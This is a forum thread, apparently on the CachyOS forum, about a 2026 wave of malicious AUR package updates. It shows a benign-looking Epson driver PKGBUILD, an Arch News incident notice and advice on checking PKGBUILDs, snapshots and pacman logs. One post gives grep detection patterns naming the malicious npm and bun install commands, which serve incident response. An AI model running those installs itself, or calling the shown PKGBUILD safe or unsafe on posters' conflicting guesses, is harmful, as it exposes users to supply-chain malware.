AUR Compromised - Almost 2000 packages affected - 20260611

How would locked pin thread with all the info required reduce visibility? Unnecessary chatter and noise isn’t a form of proper form of communication during a security incident.

example: Attack wave on AUR packages - Announcements - Garuda Linux Forum

Any way to see the pkgbuild?

It’s likely that there was a modification to the build script designed to pull in malware during the install… the issue will be in the PKGBUILD.

󰛓 ❯ paru epson-inkjet-printer-escpr2-clos-bin
1 aur/epson-inkjet-printer-escpr2-clos-bin 1.1.12-1 [+0 ~0.00]
Epson ESC/P-R2 printer driver (L8050/L8058/L6160 etc.), from UOS signed DEB
:: Zu installierende Pakete (z. B: 1 2 3, 1-3):
:: 1
:: Löse Abhängigkeiten auf…
:: Konflikte berechnen…
:: Interne Konflikte berechnen…

Repo (5)                                  Alte Version  Neue Version   Nur Make
extra/cups                                              2:2.4.19-1     Nein
extra/cups-filters                                      2.0.1-2        Nein
extra/libcupsfilters                                    2.1.1-4        Nein
extra/libppd                                            2.1.1-2        Nein
extra/qpdf                                              12.3.2-2       Nein

Aur (1)                                   Alte Version  Neue Version   Nur Make
aur/epson-inkjet-printer-escpr2-clos-bin                1.1.12-1       Nein

:: Mit Überprüfung fortfahren? [J/n]:

:: Lade PKGBUILDs herunter…
(1/1) epson-inkjet-printer-escpr2-clos-bin-1.1.12-1 [-----------------------------------------------------------------]
:: epson-inkjet-printer-escpr2-clos-bin:
.gitignore:

PKGBUILD:

epson-inkjet-printer-escpr2-clos-bin.install:

:: Änderungen akzeptieren? [J/n]: n

Hi all,

I’m fairly new to Linux — long Windows/Windows Server background, but CachyOS is my first real dive into the Linux world. It started as a test a few months ago, and I got hooked so hard I can’t imagine going back now.

It was pure coincidence that I heard about this attack. Even though I’m not infected, it raised a question: what if I had been infected and never heard about it?

First:
How would Cachy — or the nice and awesome people around it who keep it running — help me in that case? Coming from Windows, with good security tools and regular updates, sooner or later I would have known I was infected, because some sec tool would have flagged the communication to C&C servers, or manipulated DLLs/processes, etc. On Cachy there’s no equivalent phoning home, which I actually extremely appreciate from a privacy standpoint. So is the answer simply “awareness via mailing list / forum / RSS, and if you miss it, bad luck”? Or is there more to it that I’m not seeing?

To be honest, I didn’t even know these mailing lists existed until I landed on this thread — and I’ll admit I have zero appetite for signing up to something that fills my inbox. That’s kind of my point: critical security news like “your system might be compromised” should ideally surface somewhere in the OS itself — with an option to dismiss/hide it for those who don’t want it. New users coming from Windows are never going to subscribe to a mailing list or look into forums. They just won’t. So if that’s the only channel, a whole wave of migrants will simply miss things like this. Is there anything in that direction already, or is it purely on the user to go find the info?

Second:
coming from a world of mandatory EDR/XDR, I’m trying to understand the host-based detection story on Linux. I get that the security model is structurally different — signed repos, package management, smaller attack surface, review-before-build for the AUR. But for the residual risk (a compromised upstream, a bad official supplier, something that slips past review), do people here use anything like AIDE, auditd, or ClamAV? Or is the consensus that those add more noise than value, and discipline + repo trust is the real control?

I’m feeling kinda insecure now I miss my sec tools…

Asking partly with the next wave of MS->Linux migrants in mind — a lot of them won’t be very security-aware, and I’d like to understand what the realistic baseline advice for them should be.

Thanks — and thanks to everyone keeping this distro running.

It’s linked in the commits, right? And I can’t see any of that npm-stuff in there or am i reading this wrong?

@Sunda-Spirit I would not install it if it is on the list. To see the PKGBUILD, I thought I only need to go here, right? And I can see no malicious looking code in there. Maybe I’m looking wrong and I’d really love to understand my mistake.

Hmmm maybe cleaned up already? It doesn’t look ‘wrong’ to me.

You can get the current pkgbuild by doing git clone without installing…

# Maintainer: HarryLoong <local>

pkgname=epson-inkjet-printer-escpr2-clos-bin
pkgver=1.1.12
pkgrel=1
pkgdesc='Epson ESC/P-R2 printer driver (L8050/L8058/L6160 etc.), from UOS signed DEB'
arch=('x86_64' 'aarch64')
url='https://www.epson.com.cn/services/supportproduct.html?p=53ce92f1e56342f8b89981ee9b461572&tab=1'
license=('GPL-2.0-or-later' 'LGPL-2.1-or-later' 'custom:Epson')
depends=('cups' 'glibc' 'libcups')
optdepends=('colord: color profile support')
provides=('epson-inkjet-printer-escpr2')
install=${pkgname}.install
conflicts=('epson-inkjet-printer-escpr2')
options=('!debug' '!strip')

_pkgver=${pkgver//./_}
_uosver=21
_baseurl='https://eposs.epson.com.cn/EPSON/assets/resource/Download/Service/driver/Inkjet/L8058'
_debname="signed_epson-inkjet-printer-escpr2_${_pkgver}_UOS_${_uosver}"

source_x86_64=("${_debname}_amd64.deb::${_baseurl}/${_debname}_amd64.deb")
source_aarch64=("${_debname}_arm64.deb::${_baseurl}/${_debname}_arm64.deb")

sha256sums_x86_64=('b28f668b8a6248ce2dc950af6904ec5b4ec138d99b87a61bb3de5241d5021a3c')
sha256sums_aarch64=('b5262ea984320a1404561c479895c43ac4bc0f07ffda9e0216e7404a800bcfca')

noextract=("${_debname}_amd64.deb" "${_debname}_arm64.deb")

# Resolve architecture-specific source filename
if [ "$CARCH" = "x86_64" ]; then
  _srcdeb="${_debname}_amd64.deb"
elif [ "$CARCH" = "aarch64" ]; then
  _srcdeb="${_debname}_arm64.deb"
fi

prepare() {
  ar x "${_srcdeb}" data.tar.xz
}

package() {
  tar --no-same-owner -xJf data.tar.xz -C "${pkgdir}"

  rm -f "${pkgdir}/usr/lib/libescpr2.a"
  rm -f "${pkgdir}/usr/lib/libescpr2.la"

  install -dm755 "${pkgdir}/usr/share/ppd"
  ln -s ../cups/model/Epson/epson-inkjet-printer-escpr2 \
    "${pkgdir}/usr/share/ppd/epson-inkjet-printer-escpr2"

  install -dm755 "${pkgdir}/usr/share/licenses/${pkgname}"
  ln -s ../../doc/epson-inkjet-printer-escpr2/COPYING \
    "${pkgdir}/usr/share/licenses/${pkgname}/COPYING"
  ln -s ../../doc/epson-inkjet-printer-escpr2/COPYING.LIB.gz \
    "${pkgdir}/usr/share/licenses/${pkgname}/COPYING.LIB.gz"
  ln -s ../../doc/epson-inkjet-printer-escpr2/COPYING.EPSON.gz \
    "${pkgdir}/usr/share/licenses/${pkgname}/COPYING.EPSON.gz"
}

It pulls a signed .deb diretly from Epson’s official server.

The best way to stay informed about something like this would be Arch News. There are two methods to stay apprised of this within the default CachyOS.

cachy-update, which many know as the system tray icon updater. It checks the Arch News every time you update for new entries and will allow you to view entries prior to updating.

==> Looking for recent Arch News...

==> Arch News:
1 - Active AUR malicious packages incident
2 - Arch Linux 2026 Leader Election Results
3 - Breaking changes for all users of `varnish`, which is renamed to `vinyl-cache`
4 - kea >= 1:3.0.3-6 update requires manual intervention
5 - iptables now defaults to the nft backend

-> Select the news to read (e.g. 1 3 5), select 0 to read them all or press "enter" to quit: 1

---
Title: Active AUR malicious packages incident
Author: Campbell Jones
Publication date: 2026-06-12
URL: https://www.archlinux.org/news/active-aur-malicious-packages-incident/
---

We are currently experiencing a high volume of malicious package adoptions and updates in the Arch User Repository.
We are actively working to track down existing malicious commits and attempting to prevent additional malicious commits from being pushed.
While this is happening, and while we work to create a more permanent solution, users may see issues with the following:

Creating new accounts on the AUR
Pushing package updates
Adopting or creating new packages

We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time.
If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information.

The other would be within Shelly, which has become CachyOS’s default graphical package manager. Now, I don’t actually use this program but I can see in a testing VM that it does have a way to view the news.

image2318×1255 238 KB

I believe they’ve worked hard to revert the malicious changes on most if not all of the affected packages.

That said; as it always bears reiterating, checking PKGBuild this way is the best way to go.

No NPM stuff but a bin that was mysteriously updated yesterday. Wouldn’t trust and would reload machine if you pulled that update.

Because then it wouldn’t be in recent posts?

I wouldn’t install it anyway, because I don’t need it

I can’t make heads or tails of that PKGBUILD. I’ve never seen anything like it. It’s extremely suspicious.

The announcement threads are usually locked posts or rare enough that everyone visiting the front page of the forums would see it. You can even pin posts to the top of discuss and it’ll be shown wherever the user initially lands. Shifting through a 300 thread from post is not a proper way for someone to get information. Just more confusing.

PKGBUILD - ArchWiki behold, the fount of knowledge is bestowed

I’m referring to the PKGBUILD, the output of which I linked above. Can anyone interpret it?

That was me a couple of years ago… it’s time to start learning, or maybe just ask for advice for each specific case.

Most of them aren’t too bad, and you can easily check links if you’re not confident… I started doing this after the last round - the previous attacks were quite laughable, so obvious and childish in nature. Perhaps that was just a playful test run as they designed and planned for this attack - who knows?

We shouldn’t assume they’re stupid though… and there’s no danger in pasting a PKGBUILD in the forum to get advice.

Hopefully everyone has snapshots and backups - if you don’t have a snapshot old enough to predate the last update (you can check pacman.log) then a clean install is the likely answer - at least with a backup it’s not too bad to get set up again.

grep -E "npm install atomic-lockfile|bun install js-digest" /var/log/pacman.log
grep -E "Running .*(npm|npx|pnpm|yarn|bun|bunx).*" /var/log/pacman.log

Don’t get too scared by all the red text…

I don’t understand this PKGBUILD [which I linked above] at all. Sorry, my mistake.

See? That’s what I mean. It doesn’t look too suspicious to me except of course for the fact that that AUR account is brand new. I really wonder how that one package made its way on the list of infected packages. I should probably ask that over at the Arch mailing list or something, but I can’t be arsed

No - We have never had to do this before.

But this time some users who have been flagged repeatedly here have been silenced for a few days.

Any package on the list will have been flagged as compromised.
It likely has also had the malicious commits reverted by now.
But at some point it contained something not so nice.

Didn’t pull that. epsonscan2 is currently my only AUR package and it’s not on the list (and its pkgbuild commits of lately look ok to me), but I browsed the list a little and that epson package just piqued my interest.